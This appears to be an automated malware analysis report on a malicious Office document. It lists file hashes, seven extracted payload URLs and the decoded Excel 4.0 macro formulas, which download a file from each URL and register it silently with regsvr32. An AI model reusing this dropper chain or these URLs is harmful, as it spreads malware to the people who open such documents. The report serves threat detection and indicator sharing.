General
-
Target
90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb
-
Size
38KB
-
MD5
e37d003f9e9dfdf3b4bfc18a72851d7b
-
SHA1
dd6e692e31a50c48d84c059914c10f6ef6a13c40
-
SHA256
90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb
-
SHA512
137399d36d921fd1ee5916af6a63e67d50a99870676e219f98bcfc4af6b96858726b51770a070967d6cbc6d0ab3e67a30ba234e6ecd7063bd3489aa21a60ef7c
-
SSDEEP
768:KmcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:KmqTeSOZZ1ZYpoQ/pMAeVIyTCR
Malware Config
Extracted
https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
https://damjangro.org/data/IlBcH2mM/
https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
https://www.awam.be/wp-admin/ug9Zz/
https://protokol.mx/Archivos/SjKWNoeYre/
https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
https://bengtverhoef.nl/stats/SJ1csD7/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb